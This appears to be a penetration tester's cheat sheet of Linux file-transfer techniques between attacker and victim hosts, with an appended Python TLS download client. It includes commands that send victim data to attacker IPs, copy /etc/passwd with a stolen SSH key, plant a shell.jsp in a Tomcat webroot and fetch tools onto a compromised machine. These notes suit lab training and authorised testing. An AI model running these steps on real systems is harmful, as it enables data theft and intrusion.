🐧Linux File Transfers

wget

#wget

Attacker

python -m http.server

Victim

wget 192.168.45.161/socat

nc

#nc

Attacker

nc -lnvp 9001 > file

Victim

nc -q 1 -nv 192.168.45.244 9001 < file

(-q takes a number of seconds: close the connection 1 s after EOF on the file, so the listener's redirect ends and it exits)

or, with bash only (uses the shell's /dev/tcp pseudo-device):

cat file > /dev/tcp/192.168.45.244/9001

Python webdav

#python #webdav

Attacker

/home/cyber02/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

Victim

python3 -c "import requests; requests.put('http://192.168.45.184/linpeas.out', data=open('linpeas.out', 'rb'))"

Or

curl -T linpeas.out http://192.168.45.184/

Or

curl --upload-file linpeas.out http://192.168.45.184/

Or

wget --method=PUT --body-file=linpeas.out http://192.168.45.184/linpeas.out

To transfer a whole directory, compress it first:

tar -czf git.tar.gz .git
curl -T git.tar.gz http://192.168.45.184/

Extract it on the receiving side:

tar -xzvf git.tar.gz

SCP

#scp

Regular SCP

scp file.txt cyber02@192.168.45.212:/home/cyber02/Desktop/

SCP using private key

Transfer shell to remote server

scp -i id_rsa shell.jsp james@192.168.244.100:/var/lib/tomcat7/webapps/ROOT/

Get the passwd file (-O forces the legacy SCP protocol instead of SFTP, which avoids the error "scp: Received message too long")

scp -O -i id_rsa james@192.168.244.100:/etc/passwd ./passwd

Perl

Some machines are really limited and have only Perl installed; in that case Perl's LWP::Simple can do a simple HTTP transfer:

perl -e 'use LWP::Simple; getstore("http://domain/file", "file");'

If LWP::Simple is not installed (for example in a minimal PostgreSQL container), use raw TCP with Perl (no modules required):

perl -e '
use Socket;
$i="192.168.45.190";   # host that serves the file
$p=8080;               # port the nc listener on that host uses
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket: $!";
connect(S, sockaddr_in($p, inet_aton($i))) or die "connect: $!";
open(O, ">linpeas.sh") or die "Cannot open output file: $!";
while(<S>){print O $_;}   # copy everything until the sender closes the connection
close O; close S;
'

On the Kali host (the Python HTTP server cannot be used here, since the Perl script reads raw TCP, not HTTP):

nc -lnvp 8080 < linpeas.sh

Openssl (raw tcp transfer)

This is similar to the Perl raw TCP transfer, but the data is encrypted in transit.

On host

Generate a self-signed cert for SSL

openssl req -x509 -newkey rsa:2048 -keyout server.pem -out server.pem \
    -days 1 -nodes -subj '/CN=test' 2>/dev/null

Serve the file over TLS

openssl s_server -port 8080 -cert server.pem -key server.pem -quiet < linpeas.sh

On victim (target machine)

openssl s_client -connect 192.168.45.190:8080 -quiet 2>/dev/null > linpeas.sh

Openssl (HTTP transfer using stunnel)

On Host machine

# Generate certificate

openssl req -x509 -newkey rsa:2048 -keyout stunnel.pem -out stunnel.pem -days 1 -nodes -subj '/CN=test' 2>/dev/null

# Create stunnel config

cat > stunnel.conf << EOF
[https]
accept = 8080
connect = 127.0.0.1:8081
cert = stunnel.pem
key = stunnel.pem
EOF

# Start stunnel and HTTP server

stunnel stunnel.conf & python3 -m http.server 8081

On target

(echo -e "GET /nc HTTP/1.0\r\nHost: 192.168.45.190\r\n\r\n") | openssl s_client -connect 192.168.45.190:8080 -ign_eof -quiet 2>/dev/null | sed '1,/^\r$/d' > /tmp/nc
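Added example (my own code, not part of these notes): a Python client for the stunnel/HTTP path above that does what the echo/openssl/sed pipeline does, but also checks the status line and Content-Length (the sed version would happily write a 404 page to /tmp/nc) and compares the body's SHA-256 with a digest computed on the host beforehand with sha256sum. Host, port, path and the digest are placeholders.

```python
import hashlib
import socket
import ssl

def build_get_request(path: str, host: str) -> bytes:
    # HTTP/1.0 on purpose: the server closes after the body, which ends the read loop (same as the echo -e pipeline).
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()

def parse_http_response(raw: bytes) -> bytes:
    # Equivalent of sed '1,/^\r$/d', plus the checks the sed version silently skips.
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker in response")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ", 2)
    if len(parts) < 2 or not parts[1].isdigit():
        raise ValueError(f"bad status line: {lines[0]!r}")
    if int(parts[1]) != 200:
        # e.g. a 404 error page; the sed pipeline would save it to /tmp/nc as if it were the tool
        raise ValueError(f"server answered {lines[0].decode(errors='replace')}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    if b"content-length" in headers and len(body) != int(headers[b"content-length"]):
        raise ValueError(f"truncated body: {len(body)} of {headers[b'content-length'].decode()} bytes")
    return body

def sha256_matches(data: bytes, expected_hex: str) -> bool:
    # Compare against a digest computed on the sending side before the transfer.
    return hashlib.sha256(data).hexdigest() == expected_hex.lower()

def fetch_over_tls(host: str, port: int, path: str, expected_hex: str) -> bytes:
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE  # the stunnel cert is self-signed; the hash check below stands in for it
    with socket.create_connection((host, port)) as sock, ctx.wrap_socket(sock, server_hostname=host) as tls:
        tls.sendall(build_get_request(path, host))
        chunks = []
        while chunk := tls.recv(65536):
            chunks.append(chunk)
    body = parse_http_response(b"".join(chunks))
    if not sha256_matches(body, expected_hex):
        raise ValueError("SHA-256 mismatch: transfer corrupted or wrong file served")
    return body

if __name__ == "__main__":
    # Placeholders: the stunnel listener from the notes above, and a digest computed there with sha256sum.
    data = fetch_over_tls("192.168.45.190", 8080, "/nc", "<sha256 of nc computed on the host>")
    open("/tmp/nc", "wb").write(data)
```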